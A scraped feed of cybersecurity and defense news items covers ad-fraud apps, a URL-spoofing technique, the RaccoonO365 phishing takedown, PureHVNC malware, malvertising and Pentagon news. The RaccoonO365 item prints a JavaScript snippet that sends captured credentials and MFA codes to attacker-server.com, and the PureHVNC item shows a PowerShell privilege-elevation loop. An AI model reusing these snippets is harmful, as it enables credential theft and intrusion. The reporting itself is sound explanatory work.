-
The threat actor known as TA558 has been attributed to a fresh set of attacks delivering various remote access trojans (RATs) like Venom RAT to breach hotels in Brazil and Spanish-speaking markets. Russian cybersecurity vendor Kaspersky is tracking the activity, observed in summer 2025, to a cluster it tracks as RevengeHotels. “The threat actors continue to employ phishing emails with invoice
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A sophisticated mobile ad fraud operation dubbed “SlopAds” has infiltrated Google Play Store with 224 malicious applications that collectively amassed over 38 million downloads across 228 countries and territories.
The campaign represents one of the most extensive mobile fraud schemes discovered to date, utilizing advanced steganography techniques and multi-layered obfuscation to deliver fraudulent advertising payloads while evading detection mechanisms.
The threat actors behind SlopAds demonstrated remarkable sophistication by implementing a conditional fraud system that only activated when users downloaded apps through specific advertising campaigns, rather than organic Play Store visits.
This selective activation mechanism helped the malicious applications maintain their presence on the platform for extended periods while appearing legitimate to casual users and automated security systems.
Human Security analysts identified the operation while investigating anomalous patterns in their Ad Fraud Defense solution data.
The researchers discovered that SlopAds applications were generating approximately 2.3 billion fraudulent bid requests daily at peak operation, with traffic distribution heavily concentrated in the United States (30%), India (10%), and Brazil (7%).
.webp)
Global distribution of SlopAds-associated traffic (Source – Human Security) The campaign’s global reach and massive scale underscore the threat actors’ sophisticated infrastructure and operational capabilities.
The malicious applications employed Firebase Remote Config, a legitimate Google development tool, to retrieve encrypted configuration data containing URLs for downloading the primary fraud module called “FatModule.”
This abuse of trusted development platforms demonstrates how cybercriminals increasingly leverage legitimate services to mask their malicious activities and avoid detection by security solutions.
Advanced Steganographic Payload Delivery System
SlopAds employed a particularly innovative payload delivery mechanism that showcased the evolving sophistication of mobile malware operations.
The system utilized digital steganography to hide malicious code within seemingly innocuous PNG image files, effectively bypassing traditional security scanning methods that focus on executable file analysis.
.webp)
SlopAds operation (Source – Human Security) When an infected application passed initial verification checks, command-and-control servers delivered four specially crafted PNG files through encrypted ZIP archives.
These images contained hidden APK components that, when decrypted and reassembled, formed the complete FatModule responsible for executing the fraud operations.
The steganographic approach allowed the malicious payload to traverse network security filters and application store scanning systems without triggering conventional malware detection algorithms.
The FatModule incorporated multiple anti-analysis features, including debugging tool detection that specifically searched for hooking frameworks, Xposed modules, and Frida instrumentation tools commonly used by security researchers.
Additionally, the module employed string encryption throughout its codebase and utilized packed native code to obscure its true functionality from static analysis tools.
public static Boolean m45535a() { try { StackTraceElement[] stackTrace = Thread.currentThread().getStackTrace(); for (StackTraceElement element : stackTrace) { String className = element.getClassName() + "#" + element.getMethodName(); if (className.toLowerCase().contains("hook") || className.toLowerCase().contains("xpose") || className.toLowerCase().contains("frida")) { return true; } } } catch (Exception e) { e.printStackTrace(); } return false; }The fraud execution occurred within hidden WebViews that collected comprehensive device fingerprinting data, including hardware specifications, network information, and GPU details.
This information enabled precise targeting while the hidden interfaces navigated to threat actor-controlled cashout domains, generating fraudulent advertisement impressions and clicks without user awareness or interaction.
Google has since removed all identified SlopAds applications from the Play Store, and users receive automatic protection through Google Play Protect, which warns against and blocks installation of known malicious applications even from third-party sources.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for FreeThe post 224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Syteca, a global cybersecurity provider, introduced the latest release of its platform, continuing the mission to help organizations reduce insider risks and ensure sensitive data protection. Syteca 7.21 is a major update designed to enhance user privacy, simplify access management, provide seamless oversight, and improve the user experience. With release 7.21, Syteca delivers a set […]
The post New in Syteca Release 7.21: Agentless Access, Sensitive Data Masking, and Smooth Session Playback appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Syteca, a global cybersecurity provider, introduced the latest release of its platform, continuing the mission to help organizations reduce insider risks and ensure sensitive data protection.
Syteca 7.21 is a major update designed to enhance user privacy, simplify access management, provide seamless oversight, and improve the user experience.
With release 7.21, Syteca delivers a set of new capabilities, from masking sensitive information in real time to simplifying remote access. These new features help address the most pressing challenges faced by security teams worldwide.
Sensitive Data Masking
Syteca has become the first cybersecurity vendor to deliver real-time sensitive data masking. With this feature, the platform automatically detects and obscures confidential information (e.g., passwords, credit card numbers, or personal IDs) during live sessions and in recordings.
By blurring this data, Syteca helps prevent exposure of private information and supports compliance with data privacy regulations like the GDPR, HIPAA, and PCI DSS.
Web Connection Manager
Users can now launch remote sessions (RDP for Windows or SSH for Linux/Unix) directly in web browsers (Chrome, Safari, and Edge).
This means that IT teams don’t bother with installing agents, pushing updates, or troubleshooting installation issues. They just provide fast and secure access for both employees and vendors.
Full-Motion Capture of On-Screen Activity
The Syteca platform can now record continuous videos of user sessions, capturing every click and cursor movement.
Full-motion session recordings give security teams complete visibility into user activity, which can provide more detailed audit trails and speed up incident investigations. Every session is encrypted for security.
Intuitive UI
Beyond new capabilities, Syteca 7.21 introduces a redesigned user interface. The updated UI has a cleaner design while keeping familiar navigation in place. The lighter interface and reduced on-screen clutter help users find key information faster, thus streamlining daily security tasks.
“Release 7.21 gives organizations better visibility and control over their internal security,” says Oleg Shomonko, CEO of Syteca. “Features like live data masking, full-motion session recordings, and browser-based access mean our clients can enhance the security of their assets and streamline compliance while reducing IT overhead. This update reflects our focus on solving real IT security challenges without adding complexity.”
Users interested in trying Syteca’s brand new capabilities can access the demo portal at syteca.com.
About Syteca
Syteca is a comprehensive cybersecurity platform that helps organizations worldwide protect their inside perimeter. The Syteca platform combines advanced user activity monitoring (UAM) and robust privileged access management (PAM) solutions that empower organizations to govern access, mitigate insider threats, prevent data breaches, and streamline IT compliance. Syteca serves over 1,500 customers across different industries.
Contact
Chief Marketing Officer
Helen Gamasenko
Syteca
marketing@syteca.comThe post New in Syteca Release 7.21: Agentless Access, Sensitive Data Masking, and Smooth Session Playback appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
If the United States goes to war tomorrow, its Air Force will fly and fight as the world’s best. But the service will operate in a world where the assumptions that shaped it for more than 30 years no longer hold.
No longer can the Air Force rely on Bagram-style air bases as sanctuaries, thanks to anti-access and area-denial capabilities developed by China and others. To deter and defeat adversaries, the service must focus on agility, adaptability, and operating with a smaller footprint in austere environments. Leaders must refine options for getting into theater to generate tempo and seize initiative. In short, the Air Force must return to its expeditionary roots—a critical change that is already underway.
During World War II, Gen. Pete Quesada and the 9th Air Force brought expeditionary practices to the European theater. As the Third Infantry Division advanced across the continent, Quesada’s teams leap-frogged forward, establishing temporary airfields every few days to keep pace with Patton’s armored columns. Forward basing of fighter-bombers and mobile base defense, paired with air liaison officers embedded in ground units, enabled constant high-tempo combined arms to counter German Panzers. That is one example among many. But what Quesada understood—and what is essential to remember now—is that tempo and initiative are decisive advantages, especially when operating against peer adversaries in contested environments.
Today’s expeditionary approach mixes old concepts with new ones. The Air Force’s One Force Design is a transformational framework that includes future operating concepts tailored to the complex threats of great power competition.
Combined, these concepts create the ability to generate combat power within dense threat areas while under constant attack, employing fires in mass against enemy forces while simultaneously operating from defendable areas to project fires into highly contested environments. At the same time, One Force Design provides the flexibility and mass to span a range of potential future crises and operate globally. These capabilities are complementary—One Force Design enables sequenced operations and the ability to field a single lethal Air Force.
Operational concepts like Agile Combat Employment bring this framework to life, enabling the footprint to be light and lean and sustain operations from austere locations.
Critically, One Force Design also embraces interoperability, not just within formations, but with allies and partners. In today’s threat environment, everything from weapons to training to support and sustainment functions must be interchangeable, allowing rapid adjustments in dynamic operating environments. In the next fight, the Air Force will have to operate with what’s available. Interoperability is not just a convenience; it’s a necessity.
The ability to return to an expeditionary footing depends not only on doctrine or platforms, but on leadership. The Air Force must deliberately develop expeditionary leaders, ones who can execute commander’s intent with imperfect information and use that intent to establish tempo and gain and re-gain initiative.
The Air Force must develop Airmen with vision, judgment, competence, and courage. These leaders must be bold, adaptable, and willing to take calculated risks. They must be leaders who can cut through bureaucracy, empower subordinates, work across multinational and interagency lines, and inspire innovation in uncertain environments.
In today’s contested operating environment, agility, adaptability, judgment, and innovation are as critical as aircraft and munitions. Without boldness at the operational edge and the ability to execute mission command, the Air Force will remain tethered to outdated methods. That risks ceding strategic ground to adversaries who are more agile and less constrained.
Training to win
Department-level exercises like the one recently completed in the Pacific show what it looks like to return Airmen to expeditionary roots. In July, the Department of the Air Force executed a rapid mass deployment of personnel, equipment, and aircraft to over 50 locations across 3,000 miles of the Indo-Pacific. More than 12,000 personnel and 400 aircraft participated, alongside joint and coalition forces.
This was not business as usual. Incorporating multiple command exercises into one overall threat-deterrence scenario tested the ability to move and operate in austere conditions, with small groups of expert Airmen to repair equipment and operate in challenging environments.
Many of these sites weren’t traditional U.S. bases. Instead, they used allied infrastructure and dual airfields—exactly the kind of operating environment the Air Force must be ready for.
Interoperability was central. The exercise, like previous ones, affirmed that in the next fight, the Air Force will have to use what’s already there. That means maintainers and logisticians from across the joint force and partner nations integrating seamlessly.
Just as important, the large exercises helped train Airmen to establish tempo and gain initiative, using mission command to adapt and act even without perfect information. It’s a first step toward restoring the expeditionary mindset we’ll need to prevail.
One Force Design is a significant step forward; it gives direction, a shared framework, and revives our expeditionary roots. But returning to that mindset will take more than new operating concepts. It will take culture change.
No time can be wasted. Our adversaries are learning fast and rapidly developing capabilities that challenge our air superiority. The Air Force must move faster.
Combined exercises conducted on a global scale give a glimpse of what’s possible. These affirm that the Air Force is on the right path — but they are only the beginning.
Above all, the Air Force must cultivate leaders prepared for the demands of 21st-century war. Much like Project Warrior in the 1980s, the Air Force must build, select, and promote leaders who can seamlessly move from peacetime to war. Today’s Airmen must understand the risks involved in near-peer conflict and be willing to own those risks in support of our national security objectives. A secure, stable future depends on it.
Lt. Gen. David A. Harris is deputy chief of staff for Air Force Futures of the U.S. Air Force. He is the senior Air Force leader responsible for developing strategy and concepts, delivering an integrated force design, and conducting strategic assessments of the operating environment through wargames and workshops.
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A decade-old Unicode vulnerability known as BiDi Swap allows attackers to spoof URLs for sophisticated phishing attacks.
By exploiting how browsers render mixed Right-to-Left (RTL) and Left-to-Right (LTR) language scripts, threat actors can craft URLs that appear legitimate but secretly redirect users to malicious sites.
The BiDi Swap attack builds on prior Unicode manipulation methods that have long been a concern for web security.
In the past, attackers used Punycode Homograph Attacks to register domains with non-Latin characters that look nearly identical to Latin letters, creating convincing spoofs of popular websites.
Another common technique was the RTL Override exploit, where special Unicode characters were embedded in a file name or URL to reverse the text direction.
This could make a malicious executable file appear as a harmless document, tricking users into running it.
These earlier attacks demonstrated how subtle flaws in text rendering could be exploited for malicious purposes, paving the way for more advanced techniques like BiDi Swap that abuse the fundamental logic of how browsers display web addresses.
How the BiDi Swap Attack Works
Web browsers rely on the Unicode Bidirectional (BiDi) Algorithm to correctly display text containing both LTR scripts, such as English, and RTL scripts, like Arabic or Hebrew.
However, research from Varonis Threat Labs shows this algorithm has a critical weakness when handling URLs that mix scripts across subdomains and parameters.
An attacker can exploit this by crafting a URL with a legitimate-looking LTR subdomain (e.g.,
paypal.com) followed by an obscure RTL domain.Due to the browser’s flawed rendering, the legitimate subdomain is displayed as the primary domain in the address bar, visually masking the true, malicious destination.
This confuses the user, who believes they are on a trusted site while their browser is actually navigating to an attacker-controlled server, making them vulnerable to phishing and data theft.
The response from browser developers to this long-standing issue has been inconsistent. Google Chrome offers a “lookalike URL” suggestion feature, but it only flags a limited number of well-known domains, leaving many others exposed.

Mozilla Firefox takes a better approach by visually highlighting the core part of the domain in the address bar, which helps users more easily spot potential spoofs.

While Microsoft marked the issue as resolved in its Edge browser, researchers note that the underlying vulnerability in URL representation remains.
To stay safe, users should cultivate a habit of suspicion. Always hover over links to inspect their true destination before clicking, carefully verify a site’s SSL certificate, and be wary of any URL that appears to mix different language scripts or contains unusual formatting.
Ultimately, enhanced user awareness and improved browser-level defenses are essential to neutralize this deceptive threat.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
The post Hackers Exploit RTL/LTR Scripts and Browser Gaps to Hide Malicious URLs appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform known as RaccoonO365 to harvest Microsoft 365 credentials at scale.
Emerging as an off-the-shelf service, RaccoonO365 requires minimal technical skill, allowing threat actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.
These kits replicate Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.
As of September 2025, this operation has affected over 5,000 accounts across 94 countries, demonstrating the pervasive risk posed by commoditized social engineering tools.
In a coordinated legal action, Microsoft’s Digital Crimes Unit (DCU) secured a court order from the Southern District of New York to seize 338 domains facilitating the distribution of RaccoonO365, effectively dismantling the platform’s core infrastructure.
Microsoft analysts noted the rapid evolution of this service, which now boasts features that subvert MFA protections and automate credential harvesting at rates up to 9,000 targets per day.
The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks.
Although not all stolen credentials resulted in direct network intrusions, the impact on high-value sectors, particularly healthcare, was severe.
At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.
Microsoft’s partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.
The DCU’s swift intervention illustrates the necessity of legal and technical countermeasures against low-barrier tools that empower malicious actors.
Microsoft analysts identified Joshua Ogundipe, a Nigeria-based developer, as the principal architect of RaccoonO365.
Through an operational security lapse revealing a cryptocurrency wallet, investigators traced over US$100,000 in subscription payments.
Ogundipe’s Telegram channel, with more than 850 members, advertised both standard phishing kits and a newly introduced “AI-MailCheck” service designed to refine spear-phishing efficacy.
This attribution underscores how streamlined criminal enterprises can scale with minimal overhead, challenging defenders to anticipate modular threat services.
Infection Mechanism Deep Dive
RaccoonO365’s infection mechanism revolves around dynamic form injection and transparent redirection tactics.
When a victim clicks a malicious link, the browser is redirected to a decoy login page that mirrors Microsoft’s official portal.
.webp)
RaccoonO365 login page (Source – Microsoft) A small JavaScript snippet, injected at runtime, captures input fields and forwards credentials to the attacker’s server:-
document.querySelector('form').addEventListener('submit', function(e) { e.preventDefault(); let creds = { user: document.getElementById('username').value, pass: document.getElementById('password').value, otp: document.getElementById('mfa').value }; fetch('https://attacker-server.com/collect', { method: 'POST', body: JSON.stringify(creds), headers: {'Content-Type': 'application/json'} }).then(()=> window.location.href = 'https://login.microsoftonline.com'); });This code ensures seamless data exfiltration while redirecting users to the legitimate login page, minimizing suspicion.
Advanced operators employ session-token reuse and header manipulation to bypass MFA prompts.
.webp)
RaccoonO365 advertising of a new AI-enabled service (Source – Microsoft) Combined with automated email distribution and AI-driven content variation, this infection chain exemplifies modern phishing sophistication and underscores the critical importance of layered defenses and user awareness.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for FreeThe post Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The digital advertising ecosystem has become a prime hunting ground for cybercriminals, who are increasingly exploiting advertising technology companies to distribute malware and conduct malicious campaigns.
Rather than simply abusing legitimate platforms, threat actors are now operating as the platforms themselves, creating a sophisticated web of deception that leverages the inherent complexity and fragmentation of the adtech supply chain to avoid accountability.
Recent investigations have uncovered a massive operation involving Vane Viper, a threat actor that has appeared in approximately half of customer networks monitored by security researchers, generating about one trillion DNS queries over the past year.
This operation benefits from hundreds of thousands of compromised websites and strategically placed advertisements across gaming, shopping, and blog sites worldwide.
The actor’s infrastructure spans approximately 60,000 domains, representing only a fraction of the broader malicious ecosystem they control.
The sophistication of this campaign lies in its carefully constructed corporate structure designed for plausible deniability.
Corporate filings trace Vane Viper to AdTech Holding, a Cyprus-based company whose flagship subsidiary, PropellerAds, operates as both an advertising network and traffic broker.
.webp)
Key company relationships (Source – Infoblox) Infoblox researchers identified compelling evidence suggesting that PropellerAds has moved beyond merely turning a blind eye to criminal abuse of their platform, with indicators pointing to several ad-fraud campaigns originating directly from infrastructure attributed to the company.
The malvertising operation employs a complex traffic distribution system (TDS) that routes users through multiple layers of redirection before delivering malicious payloads.
This approach allows the actors to serve legitimate content to automated security tools while directing human users to malicious destinations.
The campaign’s reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content designed to maximize profit from compromised traffic.
Push Notification Persistence Mechanism
The most insidious aspect of Vane Viper’s operation involves the abuse of browser push notifications to achieve persistent access to victim devices.
The campaign utilizes malicious service workers, JavaScript files that intercept network requests between web applications and servers, to manipulate browser behavior and maintain long-term access to compromised systems.
.webp)
PropellerAds displaying where they sit in the digital advertising ecosystem (Source – Infoblox) These service workers employ script chaining techniques to abuse push notifications, with the most concerning element being their use of the
eval()function to execute arbitrary content fetched from remote URLs.The remote URL is determined by hardcoded domains within the service worker, creating a dynamic command and control mechanism that can adapt to changing operational requirements.
Once users accept push notifications, their devices become part of a persistent malvertising network, enabling a continuous stream of malicious advertisements.
The operation demonstrates remarkable resilience through its domain management strategy, cycling through thousands of newly registered domains each month while maintaining key push notification domains for years.
Analysis reveals that most operational domains remain active for less than a month, with registration counts reaching 3,500 domains in peak months, while core infrastructure domains like
omnatuor.com,propeller-tracking.com, and various push notification services includingin-page-push.comandpushimg.comhave maintained operations for over 1,200 days, ensuring operational continuity despite takedown attempts.Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for FreeThe post Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The PureHVNC remote administration tool (RAT) has emerged as a sophisticated component of the Pure malware family, gaining prominence in mid-2025 amid an uptick in targeted intrusion campaigns.
Originating from underground forums and Telegram channels, PureHVNC is marketed by its author, known as PureCoder, alongside companion tools such as PureCrypter, PureLogs, and PureMiner.
Its adoption by cybercriminal customers reflects a growing demand for modular malware suites capable of stealthy full system control and data exfiltration.
Initial deployments have leveraged the ClickFix phishing technique, luring victims with counterfeit job offers to execute malicious scripts, setting the stage for multi-stage intrusions.
In one notable incident, attackers deployed a Rust Loader, followed by PureHVNC RAT and the Sliver command-and-control framework over an eight-day window.
Check Point analysts noted that during this campaign, PureHVNC communicated with its control server to retrieve three GitHub URLs hosting supporting modules, directly implicating the developer’s own GitHub accounts in the malware’s operational infrastructure.
These GitHub repositories contained browser driver executables and plugin files essential for TwitchBot and YouTubeBot functionalities, illustrating an unusual developer-sourced supply chain for malware support files.
Beyond its initial infiltration tactics, PureHVNC demonstrates advanced capabilities for persistence and privilege escalation.
Upon execution, the RAT registers itself via scheduled tasks named to mimic legitimate Google Updater services, ensuring resilience across reboots.
.webp)
Infection chain (Source – Check Point) If running without administrative privileges, it prompts a UAC elevation loop using PowerShell:-
while ($true) { Start-Process -FilePath cmd[.]exe -Verb runas -ArgumentList 'regsvr32[.]exe MALWARE[.]dll --typerenderer' exit }Once elevated, the loader establishes a mutex (
MistyRoseNavy) to prevent duplicate execution and creates a scheduled task with a one-minute repetition interval..webp)
ClickFix Prompt (Source – Check Point) This approach, combined with AMSI bypass via an LdrLoadDll hook, allows PureHVNC to remain undetected by real-time defenses while maintaining control of the endpoint.
Infection Mechanism
PureHVNC’s initial loader is a .NET assembly delivered by the Rust Loader shellcode. The loader decrypts its payload using ChaCha20-Poly1305, validates payload size against a 1 KB threshold, and allocates executable memory to host the decrypted .NET assembly.
The embedded assembly is then loaded and executed, initializing the RAT’s main loop. Communication is established over SSL streams, where the bot sends Gzip-compressed system information—including OS version, installed antivirus products, and metadata like campaign ID—to the C2 server.
Incoming commands are received as compressed buffers, decompressed, deserialized, and dispatched to plugin threads for execution.
By segmenting payload delivery and employing encryption and compression, PureHVNC evades static signature detection and complicates network-based discovery, underscoring its stealthy infection mechanism.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for FreeThe post PureHVNC RAT Developers Leverage GitHub Host Source Code appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
·
Decades-old defense contractors are leaning into the Pentagon’s new focus on startups, entwining themselves with emerging companies that have the technologies or even the contracts they seek. “We're making bets in advance on specific capabilities and then going back to the market to say, ‘Who are the founders, and who are taking novel approaches to building something that is unique and different and can be applied within a military context?’” said Brian McCarthy, Booz Allen Hamilton’s managing partner of ventures.The trend reflects the Pentagon’s new urgency to expand the military’s industrial base and bring in more tech companies. A series of recent directives from Defense Secretary Pete Hegseth and other administration officials have prodded the Pentagon to more aggressively pursue commercial technologies, enable lower-level commanders to make their own purchases, and to use simpler contracting methods that are friendlier to would-be contractors. Defense One’s Patrick Tucker has more, here.
Pentagon CTO wants AI on every desktop in 6 to 9 months. “We want to have an AI capability on every desktop—3 million desktops—in six or nine months,” Emil Michael, defense undersecretary for research and engineering, said at a Politico event on Tuesday. “We want to have it focus on applications for corporate use cases like efficiency, like you would use in your own company…for intelligence and for warfighting.”
Michael was handed oversight of the Pentagon’s main AI body—the Chief Digital and Artificial Intelligence Office—in August, after it was demoted from reporting to Deputy Defense Secretary Stephen Feinberg. (Michael was also appointed acting DIU chief after that office’s chief resigned a few weeks ago.)
CDAO will become a research body like the Defense Advanced Research Projects Agency and Missile Defense Agency, Michael said Tuesday. “To add AI to that portfolio means it gets a lot of muscle to it,” he said. “So I'm spending at least a third of my time—maybe half—rethinking how the AI-deployment strategy is going to be at DOD.” Nextgov’s Alexandra Kelley has more, here.
Nov. 10 is the start date for implementing the Defense Department’s new cyber and supply-chain security standard for the entire industrial base. That’s when Cybersecurity Maturity Model Certification 2.0 standard will begin to appear in DOD solicitations, almost six years after Pentagon leaders began talking about it. Washington Technology has a bit more, here.
Additional reading:
- “Anatomy of Two Giant Deals: The U.A.E. Got Chips. The Trump Team Got Crypto Riches,” the New York Times reported Monday, adding that the deals are connected in ways that have not been previously reported;
- “Former GOP officials fear US strikes on alleged drug smugglers aren't legal,” Politico reported Tuesday;
- “Service academies to accept conservative alternative to SAT and ACT,” Politico reported Monday;
- “Pentagon says troops can only be exempt from shaving their facial hair for a year,” the Associated Press reported Tuesday regarding “a condition that disproportionately affects Black men”;
- And for your ears only, space policy and budget wonk Todd Harrison unpacked his latest report on “Golden Dome” during a discussion with James Lindsay of the Council on Foreign Relations on Tuesday. You can hear that via CFR, here.
Welcome to this Wednesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1939, the Soviets invaded Poland from the east—16 days after the Nazis invaded Poland from the west.
Around the world
Developing: The Trump administration could soon send the first batch of weapons for Ukraine that have been paid for by NATO allies, Reuters reported Tuesday.
The shipments fall under what’s called a Prioritized Ukraine Requirements List, or PURL. And so far, there are only two shipments cleared, which are worth about $500 million each and reportedly include air defense equipment to help Ukraine defend against the constant onslaught of Russian drones and missiles.
New: Taiwan showed off the first missile to be jointly manufactured with Anduril, Reuters reported Wednesday from Taipei. It’s called the Barracuda-500, which Anduril says has a range of more than 500 nautical miles and can carry a payload weighing more than 100 pounds. Reuters calls it “an autonomous, low-cost cruise missile.”
Bigger picture: “Taiwan has set a goal of spending 5% of its GDP on defence by 2030, up from a target of 3.3% next year, and is keen for greater international support aside from the United States,” Reuters adds.
Additional reading:
- “Denmark to buy long-range precision weapons to counter Russian threat,” Reuters reported Thursday from Copenhagen;
- And “Denmark leads large military exercise in Greenland, without US,” the wire service reported separately Thursday from Nuuk, Greenland.
Trump 2.0
There has been “a fundamental, though little-discussed, change in the administration’s national security focus,” veteran White House reporter David Sanger reported Wednesday for the New York Times. To build his case, he points to the administration’s lack of an updated national-security strategy, which Defense One’s Meghann Myers reported in mid-August.
At its core, the alleged shift concerns the administration’s draft NDS, which focuses on “defending the homeland” above any great-power threats from China or Russia.
“What’s now playing out is the administration’s interpretation of domestic defense,” which started in February with an increase in troops deployed to the southern border, followed by the creation of a militarized border zone in April, Myers reported in August. Less than two months later, Trump ordered the military to support immigration enforcement in Los Angeles—a move that a judge this month declared a violation of law. And just last month, Trump ordered the National Guard to Washington, D.C., ostensibly to “fight crime,” but they’ve since been relegated to spreading mulch and picking up trash around the city as residents have stayed home and businesses have suffered.
By the way, Senate Democrats want a congressional hearing on Trump’s deployment of the military to American cities like Washington, Los Angeles and Memphis. Dems on the Senate Armed Services Committee submitted their request to SASC Chairman Roger Wicker, R-Mississippi, Illinois Sen. Tammy Duckworth said Wednesday.
“The American people deserve clarity on the short- and long-term implications for national security and responsible stewardship of taxpayer dollars of this new focus on a mission usually reserved for law enforcement professionals,” the senators wrote to Wicker. They also note that “in many public statements since his confirmation, Secretary of Defense Pete Hegseth has regularly prioritized the southern border over the Indo-Pacific, despite a bipartisan consensus that U.S. defense policy should focus on the complex security challenges in that region.”
“We call on the Department to explain to Congress and the American people how it plans to resource, execute and justify such a campaign,” the senators write, “and how doing so will impact military readiness, the U.S. military’s execution of core missions of deterring and preparing for war, public trust in our military, implications for servicemembers and their families across the United States and the safety of the American people.”
In addition, the administration has also greenlit a campaign of naval-based attacks in the waters around Latin America. Trump claims he’s so far authorized the military to destroy three boats transporting alleged drug traffickers, though the administration has not offered evidence to back up its claims—and some of those claims took on a different, suspect form when shared with lawmakers—and Pentagon officials have declined to elaborate on the alleged third destroyed boat.
Second opinion: “No president can secretly wage war or carry out unjustified killings—that is authoritarianism, not democracy,” Democratic Sen. Jack Reed, the ranking member of the Armed Services Committee, said in a statement Monday. “These reckless, unauthorized operations not only put American lives at risk, they threaten to ignite a war with Venezuela that would drag our nation into a conflict we did not choose. The American people deserve to know what is being done in their name and why. Congress must demand answers, force transparency, and hold this administration accountable before it plunges us into another needless war,” he added.
Expert reax: Trump “likes shooting at targets that can’t shoot back,” Ivo Daalder, a former U.S. ambassador to NATO, told Sanger. Put simply, the president “sees the threat to the homeland as greater than the threat from China.”
For your radar: “The mystery now is whether Mr. Trump will take the next step,” Sanger writes. And that would include, as he threatened this week after the shooting that killed Charlie Kirk, “using the investigatory powers of the Justice Department, the F.B.I. and other agencies—to implicate nongovernmental organizations and political groups for supporting those he calls ‘leftist radicals,’ and leverage the findings to designate some of them as domestic terrorists.”
Indeed, Trump said Monday he wants to designate several U.S.-based groups as domestic terrorist organizations. “We have some pretty radical groups, and they got away with murder,” Trump told reporters Monday at the White House, without elaborating or fielding any questions for clarification. His Deputy chief of staff Stephen Miller has been pointing a finger at Democrats for several weeks, claiming in late August that it is “not a political party. It is a domestic extremist organization.”
Even “The threats of a crackdown have already taken a toll,” the Times reported Tuesday, citing “A culture of fear among prominent Democratic donors and groups concerned about retribution.” Meanwhile, “Liberal foundation leaders have been in close touch with one another in recent days, beefing up security and discussing a letter of solidarity as they await any Trump administration action.”
Additional reading: “Prosecutors already have dropped nearly a dozen cases from Trump's DC crime surge, judge says,” the Associated Press reported Wednesday.
Developing: House GOP lawmakers want $30 million for increased personal security, the Wall Street Journal reported Wednesday “as many lawmakers say they have canceled events or changed routines” after Kirk’s death last week in Utah.
One complication: “Party leaders such as [House Speaker Mike Johnson] currently have personal security details. That has fueled criticism from some colleagues that leaders don’t understand their fears,” the Journal writes.
“Somebody’s going to get killed” if lawmakers don’t get a larger ensemble of protective officers following closely while they travel, Tennessee GOP Rep. Tim Burchett said. “Leadership’s got their protective bubble around them. They’re not accosted when they cross the street, and there’s no Capitol Police to be seen. They don’t see that. And it’s falling on deaf ears,” he said.
For what it’s worth, Democratic Sen. Jon Fetterman was not terribly concerned about the issue when speaking to reporters Monday. “If somebody wants to take me out, it would be easy to just pop me,” the Pennsylvania lawmaker said. Read more, here.
And lastly, in case you missed it: “Since 1990, far-right extremists have committed far more ideologically motivated homicides than far-left or radical Islamist extremists,” according to a study published by researchers at the U.S. Justice Department’s National Institute of Justice in June 2024. The authors tallied 227 such far-right attacks that killed more than 520 people. “In this same period, far-left extremists committed 42 ideologically motivated attacks that took 78 lives,” the researchers said.
Trump’s Justice Department has removed the report from its website. Investigative reporter Jason Paladino noticed the omission and wrote about it on Friday. “Militant, nationalistic, white supremacist violent extremism has increased in the United States,” the authors warned in the report. “In fact, the number of far-right attacks continues to outpace all other types of terrorism and domestic violent extremism.”
Fortunately, the study was archived, and can be found (PDF) here.
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶


